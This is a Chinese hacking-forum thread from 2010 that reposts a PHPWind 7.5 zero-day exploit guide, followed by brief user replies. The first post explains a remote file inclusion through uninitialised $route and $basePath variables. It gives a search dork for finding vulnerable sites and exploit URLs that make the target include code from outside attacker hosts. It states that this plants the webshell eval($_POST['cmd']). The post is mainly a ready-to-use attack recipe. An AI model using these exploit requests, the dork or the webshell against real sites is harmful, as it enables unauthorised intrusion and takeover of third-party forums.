返回列表 发帖
柔肠寸断

Rank: 15Rank: 15Rank: 15Rank: 15Rank: 15

帖子
3852 
积分
13044 
威望
16780  
金钱
36761  
在线时间
1139 小时 

管理组高手勋章核心成员原创奖章帅哥勋章突出贡献奖优质人品奖章论坛元老管理组成员技术组成员
1 跳转到 » 倒序看帖
打印
tT
发表于 2010-1-11 00:10 | 只看该作者

PW 7.5 0day利用方法及原理(转载)

原理
先声明为转载,方法测试可行
<?php
if ($route == "groups") {
require_once $basePath . '/action/m_groups.php';
} elseif ($route == "group") {
require_once $basePath . '/action/m_group.php';
} elseif ($route == "galbum") {
require_once $basePath . '/action/m_galbum.php';
}
这是PHPWIND程序有漏洞的源代码。
在代码里$route变量没有初始化,导致可以在外面给它赋值,当他的值为groups,他就会包含
$basePath . '/action/m_groups.php';这个文件,而这个文件的前半部分$basePath也是个变量,同时在程序里没有给它初始化。所以,再次给它赋值,我给它赋值为http://www.3ast.com.cn、所以他就包含了我这个页面http://www.3ast.com.cn/action/m_groups.php的代码,我只需要在我的页面里写入复制文件的代码即可写入一句话木马

关键字"PHPWIND 7.5" inurl:com/bbs
论坛根目录添加:

apps/groups/index.php?route=groups&basePath=http://www.3ast.com.cn



然后成功的话会产生一句话木马  <?php eval($_POST['cmd'])?>  在:     论坛根目录/data/tplcache/1ii1.php

一句话木马客户端:http://www.3ast.com.cn/tool/lanker.htm


--------------------------------------------------------------------------------

第二版!

和Jack.jun看完漏洞分析后研究出来利用方法

浏览器访问
http://qkxzlt.com/apps/groups/in ... jp.77169.net/x.txt?

访问后就可以包含文件并获得webshell(问好要带上,不然会失败)
要测试其他站是否存在漏洞,
加上apps/groups/index.php?route=groups&basePath=http://wjs001.3.xjp.77169.net/x.txt?
访问,获得shell说明漏洞存在并利用成功,不能获得shell说明漏洞打
收藏 分享
希望做站长本人的学生请点击
http://www.3ast.com/viewthread.php?tid=13841
QQ790653916只负责SEO以及收费教学等方面联系,他人勿扰
于智者同行,你会不同凡响;与高人为伍,你会登上巅峰

gxp118

Rank: 2

帖子
34 
积分
74 
威望
81  
金钱
86  
在线时间
8 小时 
2
发表于 2010-1-11 17:10 | 只看该作者
去试一下 看看

TOP

robout

Rank: 1

帖子
14 
积分
15 
威望
15  
金钱
24  
在线时间
0 小时 
3
发表于 2010-1-11 17:40 | 只看该作者
菜鸟学习一下

TOP

robout

Rank: 1

帖子
14 
积分
15 
威望
15  
金钱
24  
在线时间
0 小时 
4
发表于 2010-1-11 17:41 | 只看该作者
菜鸟学习一下

TOP

robout

Rank: 1

帖子
14 
积分
15 
威望
15  
金钱
24  
在线时间
0 小时 
5
发表于 2010-1-11 17:41 | 只看该作者
菜鸟学习一下

TOP

gxp118

Rank: 2

帖子
34 
积分
74 
威望
81  
金钱
86  
在线时间
8 小时 
6
发表于 2010-1-11 17:59 | 只看该作者
测试过了  
不怎么好拿·

TOP

柔肠寸断

Rank: 15Rank: 15Rank: 15Rank: 15Rank: 15

帖子
3852 
积分
13044 
威望
16780  
金钱
36761  
在线时间
1139 小时 

管理组高手勋章核心成员原创奖章帅哥勋章突出贡献奖优质人品奖章论坛元老管理组成员技术组成员
7
发表于 2010-1-11 23:15 | 只看该作者
漏洞被补的差不多 了
希望做站长本人的学生请点击
http://www.3ast.com/viewthread.php?tid=13841
QQ790653916只负责SEO以及收费教学等方面联系,他人勿扰
于智者同行,你会不同凡响;与高人为伍,你会登上巅峰

TOP

li707392

Rank: 1

帖子
16 
积分
29 
威望
38  
金钱
48  
在线时间
1 小时 
8
发表于 2010-1-16 14:02 | 只看该作者
不懂~
呵呵~
自己慢慢学习中

TOP

返回列表